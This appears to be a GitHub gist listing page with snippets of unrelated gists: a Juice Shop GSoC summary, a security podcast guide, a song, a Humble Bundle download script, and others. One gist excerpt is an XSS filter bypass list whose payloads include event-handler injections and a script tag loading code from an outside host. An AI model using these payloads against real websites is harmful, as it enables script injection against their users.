Björn Kimminich bkimminich

#!/usr/local/bin/python3.7
import itertools
import random
import ipaddress
import time
import aiohttp
import asyncio
base_url = 'http://localhost:3000'
@Aashish683
Aashish683 / GSoC-2018.md
Last active March 27, 2019 11:46
Summary of the work which I did during Google Summer of Code 2018 with OWASP.

This gist describes the work which was done in the Frontend Technology Update project this summer for the OWASP Juice Shop Project under Google Summer of Code 2018. The work done for the project is in the gsoc-frontend branch of the Juice Shop repository, while the work done for the Challenge Pack project by @CaptainFreak is in the gsoc-challenges branch. Both branches were rebased to a third branch, gsoc-integration, which would contain the combined progress overall by both projects.

The project was split into three phases:

  1. Components and services were created in Angular that would replace the controllers and services in AngularJS. Unit tests
@7MinSec
7MinSec / CryptoLockerd.md
Last active November 15, 2018 18:48
This is an infosec-themed song called CryptoLocker'd

You can listen to this song on episode #276 of the 7 Minute Security podcast

Verse 1

You said you wouldn't do it
You said you wouldn't click that link
But you totally did
It’s clear you didn’t stop and think
How the promise of a free burrito would be all that it took
To open up our networks to virtual crooks

@7MinSec
7MinSec / 7MS_episode_guide.md
Last active January 4, 2024 18:38
7 Minute Security podcast episode guide

7 Minute Security podcast - full episode guide

Below is a blurb on each podcast episode, as well as a link to the corresponding show notes (if available). I apologize but this gist is often a little outdated, so to view the show notes for the latest episodes be sure to also check out 7ms.us.


Today, sadly, might be the last episode of DIY pentest dropbox tips for a while because I found (well, ChatGPT did actually) the missing link to 100% automate a Kali Linux install! Check episode #449 for more info on building your Kali preseed file, but essentially the last line in my file runs a kali.sh script to download/install all the pentest tools I want.

View this episode's show notes for more information

@barrywoolgar
barrywoolgar / hb_all_books_dl.js
Created September 2, 2016 11:06 — forked from graymouser/hb_all_books_dl.js
Humble bundle book bundles - download all books at once
/*
After purchasing a humble book bundle, go to your download page for that bundle.
Open a console window for the page and paste in the below javascript.
This will download all the books in all the formats available.
*/
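$('a').each(function(i){
  // Only follow links whose text is one of the book formats
  if (['MOBI', 'PDF', 'EPUB'].indexOf($.trim($(this).text())) >= 0) {
    // A hidden iframe per link triggers the download without leaving the page
    $('body').append('<iframe id="dl_iframe_'+i+'" style="display:none;">');
    document.getElementById('dl_iframe_'+i).src = $(this).data('web');
  }
});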

This document has moved!

It's now here, in The Programmer's Compendium. The content is the same as before, but being part of the compendium means that it's actively maintained.

@marcaube
marcaube / harlem-shake.js
Created April 8, 2016 18:04
Harlem Shake, a script to make those XSS dance
// Source: http://pastebin.com/aJna4paJ
@denilsonsa
denilsonsa / README.md
Last active May 1, 2024 11:41
Embed VTT subtitles into HTML

Embed VTT subtitles into HTML

Objective

I have a video file on my local disk. I also have some subtitles (in HTML5's WebVTT format).

I want to create an HTML file to play that video with subtitles, all from the local filesystem.

Problem

@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active May 9, 2024 06:17
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@staltz
staltz / introrx.md
Last active May 9, 2024 07:59
The introduction to Reactive Programming you've been missing